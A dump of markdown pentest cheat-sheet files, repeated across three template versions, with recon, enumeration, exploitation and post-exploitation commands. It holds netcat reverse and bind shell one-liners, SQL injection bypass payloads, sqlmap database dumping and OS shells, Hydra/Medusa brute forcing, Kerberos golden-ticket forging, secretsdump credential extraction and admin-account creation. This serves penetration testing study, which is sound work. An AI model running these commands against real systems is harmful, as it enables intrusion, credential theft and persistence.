High Value Information/Hashes/2. 
Cracking Hashes Online/Hydra.md: -------------------------------------------------------------------------------- 1 | - hydra -l user -P pass.txt -t 10 172.21.0.0 ssh -s 22 2 | 3 | - hydra -l users.txt -p /usr/share/wordlists/rockyou.txt -t 172.21.0.0 ssh -s 22 4 | 5 | - hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Scheduled Jobs_Tasks/General Notes_.md: -------------------------------------------------------------------------------- 1 | # Windows: 2 | 3 | - schtasks 4 | 5 | ## Impacket: 6 | 7 | - python3 atexec.py Domain/Administrator:@123@172.21.0.0 systeminfo 8 | 9 | 10 | # Linux: 11 | 12 | - cat /etc/crontab 13 | - cat /etc/anacrontab 14 | - cat /etc/frontal 15 | - cat /etc/anacron 16 | - systemctl list-timers --all -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/2. Cracking Hashes Online/Hydra.md: -------------------------------------------------------------------------------- 1 | - hydra -l user -P pass.txt -t 10 172.21.0.0 ssh -s 22 2 | 3 | - hydra -l users.txt -p /usr/share/wordlists/rockyou.txt -t 172.21.0.0 ssh -s 22 4 | 5 | - hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location' -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. 
Post Exploitation/Target _1 (Default Template)/System Information/General Notes Windows.md: -------------------------------------------------------------------------------- 1 | # Command Line: 2 | 3 | - systeminfo 4 | 5 | # PowerShell 6 | 7 | - Get-ComputerInfo 8 | - Get-ComputerInfo -Property "*version" 9 | - Get-ComputerInfo -Property "*version", "os*" | select WindowsCurrentVersion, WindowsVersion, OsName, OsBuildNumber, OsHotFixes, OsArchitecture | fl -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Scheduled Jobs_Tasks/General Notes Windows.md: -------------------------------------------------------------------------------- 1 | # Windows: 2 | 3 | - schtasks 4 | 5 | ## Impacket: 6 | 7 | - python3 atexec.py Domain/Administrator:@123@172.21.0.0 systeminfo 8 | 9 | 10 | # Linux: 11 | 12 | - cat /etc/crontab 13 | - cat /etc/anacrontab 14 | - cat /etc/frontal 15 | - cat /etc/anacron 16 | - systemctl list-timers --all -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Running Processes/General Notes Linux.md: -------------------------------------------------------------------------------- 1 | # Linux Commands to run: 2 | 3 | - top 4 | - htop 5 | - ps -e 6 | - ps aux 7 | - ps aux | more 8 | - ps aux | less 9 | 10 | ## Finding processes 11 | 12 | - pgrep 13 | 14 | ## Terminating a Process 15 | 16 | - kill 17 | - kill -9 PID 18 | - pkill processName 19 | - killall 20 | 21 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. 
Post Exploitation/Target _1 (Default Template)/Scheduled Jobs_Tasks/General Notes Windows.md: -------------------------------------------------------------------------------- 1 | # Windows: 2 | 3 | - schtasks 4 | 5 | ## Impacket: 6 | 7 | - python3 atexec.py Domain/Administrator:@123@172.21.0.0 systeminfo 8 | 9 | 10 | # Linux: 11 | 12 | - cat /etc/crontab 13 | - cat /etc/anacrontab 14 | - cat /etc/frontal 15 | - cat /etc/anacron 16 | - systemctl list-timers --all -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/General Notes.md: -------------------------------------------------------------------------------- 1 | # When in Doubt...Always Enumerate! Enumeration is the key! 2 | 3 | ## Resources 4 | - http://www.0daysecurity.com/penetration-testing/enumeration.html 5 | - Backup Link: https://web.archive.org/web/20201122081447/http://www.0daysecurity.com/penetration-testing/enumeration.html 6 | - https://book.hacktricks.xyz/generic-methodologies-and-resources/pentesting-methodology 7 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/System Information/General Notes Linux.md: -------------------------------------------------------------------------------- 1 | ## For all Linux Distro's: 2 | 3 | - uname -a 4 | - cat /etc/issue 5 | - cat /proc/version 6 | 7 | ## PowerShell 8 | 9 | - $PSVersionTable 10 | 11 | Obtaining Systems Enviorment Variables: 12 | 13 | - Get-ChildItem -Path Env: 14 | 15 | ## Debian: 16 | 17 | - dmesg | grep Linux 18 | 19 | ## RedHat: 20 | 21 | - rpm -q kernel 22 | 23 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. 
Post Exploitation/Target _1 (Default Template)/System Information/General Notes Linux.md: -------------------------------------------------------------------------------- 1 | ## For all Linux Distro's: 2 | 3 | - uname -a 4 | - cat /etc/issue 5 | - cat /proc/version 6 | 7 | ## PowerShell 8 | 9 | - $PSVersionTable 10 | 11 | Obtaining Systems Enviorment Variables: 12 | 13 | - Get-ChildItem -Path Env: 14 | 15 | 16 | ## Debian: 17 | 18 | - dmesg | grep Linux 19 | 20 | ## RedHat: 21 | 22 | - rpm -q kernel 23 | 24 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/General Notes.md: -------------------------------------------------------------------------------- 1 | # "PCAP IT OR IT DIDNT HAPPEN...its up to you if you need to" 2 | 3 | ## tcpdump: 4 | 5 | - tcpdump -i eth0 6 | - tcpdump -c -i eth0 7 | - tcpdump -A -i eth0 8 | - tcpdump -w 0001.pcap -i eth0 9 | - tcpdump -r 0001.pcap 10 | - tcpdump -n -i eth0 11 | - tcpdump -i eth0 port 22 12 | - tcpdump -i eth0 -src 172.21.10.X 13 | - tcpdump -i eth0 -dst 172.21.10.X 14 | 15 | ## Other tools: 16 | 17 | Tshark (Command Line Wireshark) 18 | Wireshark 19 | 20 | 21 | 22 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. 
Recon Notes/Discovery Scans/Domain_Sub Domain Discovery.md: -------------------------------------------------------------------------------- 1 | # Domain Discovery 2 | 3 | Sublis3r: 4 | 5 | - Sublist3r -d www.example.com 6 | - Sublist3r -v -d www.example.com -p 80,443 7 | 8 | Subfinder: 9 | - subfinder -d megacorpone.com 10 | 11 | OWASP AMASS: 12 | 13 | - amass enum -d www.example.com 14 | - amass intel -whois -d www.example.com 15 | - amass intel -active 172.21.0.0-64 -p 80,443,8080,8443 16 | - amass intel -ipv4 -whois -d www.example.com 17 | - amass intel -ipv6 -whois -d www.example.com -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3. Exploitation/Bypass Windows Amsi.md: -------------------------------------------------------------------------------- 1 | ## Testing for Amsi Bypass: 2 | 3 | - https://github.com/rasta-mouse/AmsiScanBufferBypass 4 | 5 | ## Amsi-Bypass-Powershell 6 | 7 | - https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell 8 | 9 | ## Resources: 10 | 11 | - https://blog.f-secure.com/hunting-for-amsi-bypasses/ 12 | - https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/ 13 | - https://github.com/cobbr/PSAmsi/wiki/Conducting-AMSI-Scans 14 | - https://slaeryan.github.io/posts/falcon-zero-alpha.html -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. 
Exploitation/Bypass Windows Amsi.md: -------------------------------------------------------------------------------- 1 | ## Testing for Amsi Bypass: 2 | 3 | - https://github.com/rasta-mouse/AmsiScanBufferBypass 4 | 5 | ## Amsi-Bypass-Powershell 6 | 7 | - https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell 8 | 9 | ## Resources: 10 | 11 | - https://blog.f-secure.com/hunting-for-amsi-bypasses/ 12 | - https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/ 13 | - https://github.com/cobbr/PSAmsi/wiki/Conducting-AMSI-Scans 14 | - https://slaeryan.github.io/posts/falcon-zero-alpha.html -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Users and Groups/General Notes Windows.md: -------------------------------------------------------------------------------- 1 | View your current user: 2 | 3 | - whoami 4 | 5 | View information about the current user: 6 | 7 | - net user afsimmons 8 | 9 | - net user afsimmons /domain (For a domain user) 10 | 11 | View Local Groups: 12 | 13 | - net localgroup 14 | - net localgroup Administrators 15 | 16 | Add a new user: 17 | 18 | - net user afsimmons enterpasswordhere /add 19 | 20 | Add a user in a localgroup: 21 | 22 | - net localgroup Administrators afsimmons 23 | 24 | 25 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/2. 
Cracking Hashes Online/Medusa.md: -------------------------------------------------------------------------------- 1 | - medusa -h target-ip -u [username] -P ../creds/passwords.txt -M http 2 | 3 | - medusa -h 172.21.0.0 -U [path to username file] -P [path to password file] -M ftp 4 | 5 | - medusa -H hosts.txt -U [path to username file] -P [path to password file] -M http 6 | 7 | - medusa -h 172.21.0.0 -U [path to username file] -P [path to password file] -M ssh -n 2222 8 | 9 | - medusa -h 172.21.0.0 -U [path to username file] -P [path to password file] -M ftp -O log.txt 10 | 11 | 12 | 13 | 14 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/5. High Value Information/Hashes/2. Cracking Hashes Online/Medusa.md: -------------------------------------------------------------------------------- 1 | - medusa -h target-ip -u [username] -P ../creds/passwords.txt -M http 2 | 3 | - medusa -h 172.21.0.0 -U [path to username file] -P [path to password file] -M ftp 4 | 5 | - medusa -H hosts.txt -U [path to username file] -P [path to password file] -M http 6 | 7 | - medusa -h 172.21.0.0 -U [path to username file] -P [path to password file] -M ssh -n 2222 8 | 9 | - medusa -h 172.21.0.0 -U [path to username file] -P [path to password file] -M ftp -O log.txt 10 | 11 | 12 | 13 | 14 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. 
Post Exploitation/Target _1 (Default Template)/Users and Groups/General Notes Linux_.md: -------------------------------------------------------------------------------- 1 | ## Enumerating Linux Users 2 | 3 | - cat /etc/passwd 4 | - less etc/passwd 5 | - getent passwd | awk -F: '{ print $1}' 6 | - cut -d: -f1 /etc/passwd 7 | - awk –F: ‘{ print $1}’ /etc/passwd 8 | - getent parrwd {1000..6000} 9 | 10 | ## enumerating Users Permissions 11 | 12 | - id 13 | - id -nG 14 | - getent group 15 | 16 | ## Enumerating Linux Groups 17 | 18 | - groups 19 | - less /etc/group 20 | - getent groups 21 | - getent group | awk -F: '{ print $1}' -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Users and Groups/General Notes Windows.md: -------------------------------------------------------------------------------- 1 | View your current user: 2 | 3 | - whoami 4 | 5 | View information about the current user: 6 | 7 | - net user afsimmons 8 | 9 | - net user afsimmons /domain (For a domain user) 10 | 11 | View Local Groups: 12 | 13 | - net localgroup 14 | - net localgroup Administrators 15 | 16 | Add a new user: 17 | 18 | - net user afsimmons enterpasswordhere /add 19 | 20 | Add a user in a localgroup: 21 | 22 | - net localgroup Administrators afsimmons 23 | 24 | 25 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/2. 
Cracking Hashes Online/Medusa.md: -------------------------------------------------------------------------------- 1 | - medusa -h target-ip -u [username] -P ../creds/passwords.txt -M http 2 | 3 | - medusa -h 172.21.0.0 -U [path to username file] -P [path to password file] -M ftp 4 | 5 | - medusa -H hosts.txt -U [path to username file] -P [path to password file] -M http 6 | 7 | - medusa -h 172.21.0.0 -U [path to username file] -P [path to password file] -M ssh -n 2222 8 | 9 | - medusa -h 172.21.0.0 -U [path to username file] -P [path to password file] -M ftp -O log.txt 10 | 11 | 12 | 13 | 14 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/1. Web/SQL Injection.md: -------------------------------------------------------------------------------- 1 | Testing for Bypasses: 2 | 3 | ' or 1=1 LIMIT 1 -- 4 | ' or 1=1 LIMIT 1 -- - 5 | ' or 1=1 LIMIT 1# 6 | 'or 1# 7 | ' or 1=1 -- 8 | ' or 1=1 -- - 9 | 10 | # SQLMAP 11 | 12 | ## sqlmap crawl 13 | sqlmap -u http://172.21.0.0 --crawl=1 14 | 15 | ## sqlmap dump database 16 | sqlmap -u http://172.21.0.0 --dbms=mysql --dump 17 | 18 | ## sqlmap shell 19 | sqlmap -u http://172.21.0.0 --dbms=mysql --os-shell 20 | 21 | # SQLI 22 | 23 | Testing for a row: 24 | 25 | - http://target-ip/inj.php?id=1 union all select 1,2,3,4,5,6,7,8 -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Services/1. 
Web/SQL Injection.md: -------------------------------------------------------------------------------- 1 | Testing for Bypasses: 2 | 3 | ' or 1=1 LIMIT 1 -- 4 | ' or 1=1 LIMIT 1 -- - 5 | ' or 1=1 LIMIT 1# 6 | 'or 1# 7 | ' or 1=1 -- 8 | ' or 1=1 -- - 9 | 10 | # SQLMAP 11 | 12 | ## sqlmap crawl 13 | sqlmap -u http://172.21.0.0 --crawl=1 14 | 15 | ## sqlmap dump database 16 | sqlmap -u http://172.21.0.0 --dbms=mysql --dump 17 | 18 | ## sqlmap shell 19 | sqlmap -u http://172.21.0.0 --dbms=mysql --os-shell 20 | 21 | # SQLI 22 | 23 | Testing for a row: 24 | 25 | - http://target-ip/inj.php?id=1 union all select 1,2,3,4,5,6,7,8 -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/BloodHound.md: -------------------------------------------------------------------------------- 1 | ## Source: 2 | 3 | https://github.com/BloodHoundAD/BloodHound 4 | 5 | ## Pre-Compiled Binaries 6 | 7 | https://github.com/BloodHoundAD/BloodHound/releases 8 | 9 | ## SharpHound: 10 | 11 | https://github.com/BloodHoundAD/SharpHound3 12 | 13 | ## Bloodhound for python 14 | Note: Only compatiable with BloodHound 3.0 or newer 15 | 16 | https://github.com/fox-it/BloodHound.py 17 | 18 | 19 | ## Gather Data 20 | 21 | - import-module .\sharphound.ps1 22 | - invoke-bloodHound -CollectionMethod All -domain target-domain -LDAPUser username -LDAPPass password -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3. Enumeration Notes/Services/04. 
Web (HTTP_HTTPS)/SQL Injection.md: -------------------------------------------------------------------------------- 1 | Testing for Bypasses: 2 | 3 | ' or 1=1 LIMIT 1 -- 4 | ' or 1=1 LIMIT 1 -- - 5 | ' or 1=1 LIMIT 1# 6 | 'or 1# 7 | ' or 1=1 -- 8 | ' or 1=1 -- - 9 | 10 | # SQLMAP 11 | 12 | ## sqlmap crawl 13 | sqlmap -u http://172.21.0.0 --crawl=1 14 | 15 | ## sqlmap dump database 16 | sqlmap -u http://172.21.0.0 --dbms=mysql --dump 17 | 18 | ## sqlmap shell 19 | sqlmap -u http://172.21.0.0 --dbms=mysql --os-shell 20 | 21 | # SQLI 22 | 23 | Testing for a row: 24 | 25 | - http://target-ip/inj.php?id=1 union all select 1,2,3,4,5,6,7,8 -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Bypass Windows Amsi.md: -------------------------------------------------------------------------------- 1 | ## Testing for Amsi Bypass: 2 | 3 | - https://github.com/rasta-mouse/AmsiScanBufferBypass 4 | 5 | ## Amsi-Bypass-Powershell 6 | 7 | - https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell 8 | 9 | ## Resources: 10 | 11 | - https://blog.f-secure.com/hunting-for-amsi-bypasses/ 12 | - https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/ 13 | - https://github.com/cobbr/PSAmsi/wiki/Conducting-AMSI-Scans 14 | - https://slaeryan.github.io/posts/falcon-zero-alpha.html 15 | - https://www.hackingarticles.in/a-detailed-guide-on-amsi-bypass/ -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/6. Reporting/Tips for Writing a Report.md: -------------------------------------------------------------------------------- 1 | 1. Understand who is going to be reading this and who is the target audience? 2 | 2. The report needs to clear that a non-technical person would understand 3 | 3. Report should include the following: 4 | 1. 
Executive Summary 5 | 2. Technical Summary 6 | 3. Detail Report of findings 7 | 4. Recommendations for remediation (If possible) 8 | 9 | 10 | 11 | Resources: 12 | 13 | - https://blog.zsec.uk/ltr101-pentest-reporting/ 14 | - https://github.com/juliocesarfort/public-pentesting-reports 15 | 16 | Public Pentesting Reports: 17 | 18 | - https://github.com/juliocesarfort/public-pentesting-reports -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/6. Reporting/Tips for Writing a Report.md: -------------------------------------------------------------------------------- 1 | 1. Understand who is going to be reading this and who is the target audience? 2 | 2. The report needs to clear that a non-technical person would understand 3 | 3. Report should include the following: 4 | 1. Executive Summary 5 | 2. Technical Summary 6 | 3. Detail Report of findings 7 | 4. Recommendations for remediation (If possible) 8 | 9 | 10 | 11 | Resources: 12 | 13 | - https://blog.zsec.uk/ltr101-pentest-reporting/ 14 | - https://github.com/juliocesarfort/public-pentesting-reports 15 | 16 | Public Pentesting Reports: 17 | 18 | - https://github.com/juliocesarfort/public-pentesting-reports -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. 
Post Exploitation/BloodHound.md: -------------------------------------------------------------------------------- 1 | ## Source: 2 | 3 | https://github.com/BloodHoundAD/BloodHound 4 | 5 | ## Pre-Compiled Binaries 6 | 7 | https://github.com/BloodHoundAD/BloodHound/releases 8 | 9 | ## SharpHound: 10 | 11 | https://github.com/BloodHoundAD/SharpHound3 12 | 13 | ## Bloodhound for python 14 | Note: Only compatiable with BloodHound 3.0 or newer 15 | 16 | https://github.com/fox-it/BloodHound.py 17 | 18 | ## Install on Kali: 19 | 20 | apt install bloodhound 21 | 22 | ## Gather Data 23 | 24 | - import-module .\sharphound.ps1 25 | - invoke-bloodHound -CollectionMethod All -domain target-domain -LDAPUser username -LDAPPass password -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Impacket.md: -------------------------------------------------------------------------------- 1 | # Generate Silver Tickets with Impacket: 2 | - python3 ticketer.py -nthash -domain-sid -domain -spn 3 | - python3 ticketer.py -aesKey -domain-sid -domain -spn 4 | 5 | # Generate Golden Tickets: 6 | - python3 ticketer.py -nthash -domain-sid -domain 7 | - python3 ticketer.py -aesKey -domain-sid -domain 8 | 9 | # Credential Access with Secretsdump 10 | 11 | - impacket-secretsdump username@target-ip -dc-ip target-ip -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. 
Post Exploitation/Impacket.md: -------------------------------------------------------------------------------- 1 | # Generate Silver Tickets with Impacket: 2 | - python3 ticketer.py -nthash -domain-sid -domain -spn 3 | - python3 ticketer.py -aesKey -domain-sid -domain -spn 4 | 5 | # Generate Golden Tickets: 6 | - python3 ticketer.py -nthash -domain-sid -domain 7 | - python3 ticketer.py -aesKey -domain-sid -domain 8 | 9 | # Credential Access with Secretsdump 10 | 11 | - impacket-secretsdump username@target-ip -dc-ip target-ip -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Responder.md: -------------------------------------------------------------------------------- 1 | Cannot use in the OSCP Exam. Fun to use on assessments. 2 | Note: Multirelay.py does not work in python3 since the UserDict library has been depricated 3 | 4 | 5 | # Source: https://github.com/lgandx/Responder 6 | 7 | ## Make changes to config to turn off services: 8 | 9 | nano /usr/share/responder/Responder.conf 10 | 11 | ## Starting Responder: 12 | 13 | - responder -I [Interface] -A 14 | - responder -I [Interface] -i [IP Address] or -e [External IP] -A 15 | 16 | ## Tools in Responder: 17 | 18 | Location: /usr/share/Responder/tools 19 | 20 | ## Check for systems with SMB Signing not enabled 21 | 22 | - python3 RunFinger.py -i 172.21.0.0/24 23 | 24 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/2. Enumeration/Responder.md: -------------------------------------------------------------------------------- 1 | Cannot use in the OSCP Exam. Fun to use on assessments. 
2 | Note: Multirelay.py does not work in python3 since the UserDict library has been depricated 3 | 4 | 5 | # Source: https://github.com/lgandx/Responder 6 | 7 | ## Make changes to config to turn off services: 8 | 9 | nano /usr/share/responder/Responder.conf 10 | 11 | ## Starting Responder: 12 | 13 | - responder -I [Interface] -A 14 | - responder -I [Interface] -i [IP Address] or -e [External IP] -A 15 | 16 | ## Tools in Responder: 17 | 18 | Location: /usr/share/Responder/tools 19 | 20 | ## Check for systems with SMB Signing not enabled 21 | 22 | - python3 RunFinger.py -i 172.21.0.0/24 23 | 24 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Kerberos Ticket Creation.md: -------------------------------------------------------------------------------- 1 | # Generate Silver Tickets with Impacket: 2 | - python3 ticketer.py -nthash -domain-sid -domain -spn 3 | - python3 ticketer.py -aesKey -domain-sid -domain -spn 4 | 5 | # Generate Golden Tickets: 6 | - python3 ticketer.py -nthash -domain-sid -domain 7 | - python3 ticketer.py -aesKey -domain-sid -domain 8 | 9 | # Credential Access with Secretsdump 10 | 11 | - impacket-secretsdump username@target-ip -dc-ip target-ip -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3. 
Exploitation/Netcat Tips.md: -------------------------------------------------------------------------------- 1 | ## Fundamentals: 2 | 3 | Connect to a netcat client: 4 | - rlwrap nc [IP Address] [port] 5 | 6 | Connect to a netcat Listener: 7 | 8 | - rlwrap nc -lvp [Localport] 9 | 10 | More info on rlwrap: https://linux.die.net/man/1/rlwrap 11 | 12 | ## Backdoor Shells: 13 | 14 | Linux: 15 | 16 | - rlwrap nc [Your IP Address] -e /bin/sh 17 | - rlwrap nc [Your IP Address] -e /bin/bash 18 | - rlwrap nc [Your IP Address] -e /bin/zsh 19 | - rlwrap nc [Your IP Address] -e /bin/ash 20 | 21 | 22 | Windows: 23 | 24 | - rlwrap nc -lv [localport] -e cmd.exe 25 | 26 | Linux netcat reverse shell: 27 | 28 | - rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.21.0.0 1234 >/tmp/f -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3. Exploitation/Netcat Tips.md: -------------------------------------------------------------------------------- 1 | ## Fundamentals: 2 | 3 | Connect to a netcat client: 4 | - rlwrap nc [IP Address] [port] 5 | 6 | Connect to a netcat Listener: 7 | 8 | - rlwrap nc -lvp [Localport] 9 | 10 | More info on rlwrap: https://linux.die.net/man/1/rlwrap 11 | 12 | ## Backdoor Shells: 13 | 14 | Linux: 15 | 16 | - rlwrap nc [Your IP Address] -e /bin/sh 17 | - rlwrap nc [Your IP Address] -e /bin/bash 18 | - rlwrap nc [Your IP Address] -e /bin/zsh 19 | - rlwrap nc [Your IP Address] -e /bin/ash 20 | 21 | 22 | Windows: 23 | 24 | - rlwrap nc -lv [localport] -e cmd.exe 25 | 26 | Linux netcat reverse shell: 27 | 28 | - rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.21.0.0 1234 >/tmp/f -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. 
Exploitation Notes/Netcat Tips.md: -------------------------------------------------------------------------------- 1 | ## Fundamentals: 2 | 3 | Connect to a netcat client: 4 | - rlwrap nc [IP Address] [port] 5 | 6 | Connect to a netcat Listener: 7 | 8 | - rlwrap nc -lvp [Localport] 9 | 10 | More info on rlwrap: https://linux.die.net/man/1/rlwrap 11 | 12 | ## Backdoor Shells: 13 | 14 | Linux: 15 | 16 | - rlwrap nc [Your IP Address] -e /bin/sh 17 | - rlwrap nc [Your IP Address] -e /bin/bash 18 | - rlwrap nc [Your IP Address] -e /bin/zsh 19 | - rlwrap nc [Your IP Address] -e /bin/ash 20 | 21 | 22 | Windows: 23 | 24 | - rlwrap nc -lv [localport] -e cmd.exe 25 | 26 | Linux netcat reverse shell: 27 | 28 | - rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.21.0.0 1234 >/tmp/f -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Installed Applications/General Notes Linux.md: -------------------------------------------------------------------------------- 1 | ## Debian: 2 | 3 | - ls -alh /usr/bin/ 4 | - ls -alh /sbin/ 5 | - dpkg -l 6 | - ls -alh /var/cache/apt/archivesO 7 | - ls /usr/share/applications | awk -F '.desktop' ' { print $1}' - 8 | 9 | ## RedHat: 10 | 11 | - rpm -qa 12 | - ls -alh /var/cache/yum/ 13 | 14 | 15 | ## BSD: 16 | 17 | - pkg_info 18 | 19 | ## Gentoo: 20 | 21 | - equery list 22 | - eix -I 23 | 24 | ## Arch Linux: 25 | 26 | - pacman -Q 27 | 28 | 29 | ## Bash Script: 30 | 31 | ``` 32 | #!/bin/bash 33 | IFS=: read -ra dirs_in_path <<< "$PATH" 34 | 35 | for dir in "${dirs_in_path[@]}"; do 36 | for file in "$dir"/*; do 37 | [[ -x $file && -f $file ]] && printf '%s\n' "${file##*/}" 38 | done 39 | done 40 | ``` -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. 
Post Exploitation/Users and Groups/General Notes Linux_.md: -------------------------------------------------------------------------------- 1 | ## Enumerating Linux Users 2 | 3 | - cat /etc/passwd 4 | - less etc/passwd 5 | - getent passwd | awk -F: '{ print $1}' 6 | - cut -d: -f1 /etc/passwd 7 | - awk –F: ‘{ print $1}’ /etc/passwd 8 | - getent parrwd {1000..6000} 9 | 10 | ## Enumerating Users Permissions 11 | 12 | - id 13 | - id -nG 14 | - getent group 15 | 16 | ## Enumerating Linux Groups 17 | 18 | - groups 19 | - less /etc/group 20 | - getent groups 21 | - getent group | awk -F: '{ print $1}' 22 | 23 | ## Creating a user in linux: 24 | 25 | - adduser afsimmons # (alt, use full path: /usr/sbin/adduser afsimmons) 26 | - passwd afsimmons 27 | - useradd -G {group-name} afsimmons 28 | 29 | - /usr/sbin/usermod -aG sudo afsimmons -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/4. Post Exploitation/Target _1 (Default Template)/Installed Applications/General Notes Linux.md: -------------------------------------------------------------------------------- 1 | ## Debian: 2 | 3 | - ls -alh /usr/bin/ 4 | - ls -alh /sbin/ 5 | - dpkg -l 6 | - ls -alh /var/cache/apt/archivesO 7 | - ls /usr/share/applications | awk -F '.desktop' ' { print $1}' - 8 | 9 | ## RedHat: 10 | 11 | - rpm -qa 12 | - ls -alh /var/cache/yum/ 13 | 14 | 15 | ## BSD: 16 | 17 | - pkg_info 18 | 19 | ## Gentoo: 20 | 21 | - equery list 22 | - eix -I 23 | 24 | ## Arch Linux: 25 | 26 | - pacman -Q 27 | 28 | 29 | ## Bash Script: 30 | 31 | ``` 32 | #!/bin/bash 33 | IFS=: read -ra dirs_in_path <<< "$PATH" 34 | 35 | for dir in "${dirs_in_path[@]}"; do 36 | for file in "$dir"/*; do 37 | [[ -x $file && -f $file ]] && printf '%s\n' "${file##*/}" 38 | done 39 | done 40 | ``` -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template 
Master 3.0/7. Post Exploitation/Network/General Notes Linux.md: -------------------------------------------------------------------------------- 1 | ## What does the targets network look like: 2 | 3 | - /sbin/ifconfig -a 4 | - /sbin/ip addr 5 | - cat /etc/network/interfaces 6 | - cat /etc/sysconfig/network 7 | - ip addr show 8 | 9 | ## Network configuration Settings: 10 | 11 | - cat /etc/resolv.conf 12 | - cat /etc/sysconfig/network 13 | - cat /etc/networks 14 | - iptables -L 15 | - hostname 16 | - dnsdomainname 17 | 18 | ## List all current connections 19 | 20 | - lsof -i 21 | - lsof -i :80 22 | - grep 80 /etc/services 23 | - netstat -antup 24 | - netstat -antpx 25 | - netstat -tulpn 26 | - chkconfig --list 27 | - chkconfig --list | grep 3:on 28 | 29 | ## Check the routes: 30 | 31 | - arp -e 32 | - route 33 | - route -n 34 | - /sbin/route -nee 35 | - ip route list 36 | 37 | References: 38 | 39 | -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5. Exploitation Notes/Villian Cheatsheet.md: -------------------------------------------------------------------------------- 1 | # Installation: 2 | sudo apt update&&sudo apt install gnome-terminal 3 | git clone https://github.com/t3l3machus/Villain 4 | cd ./Villain 5 | 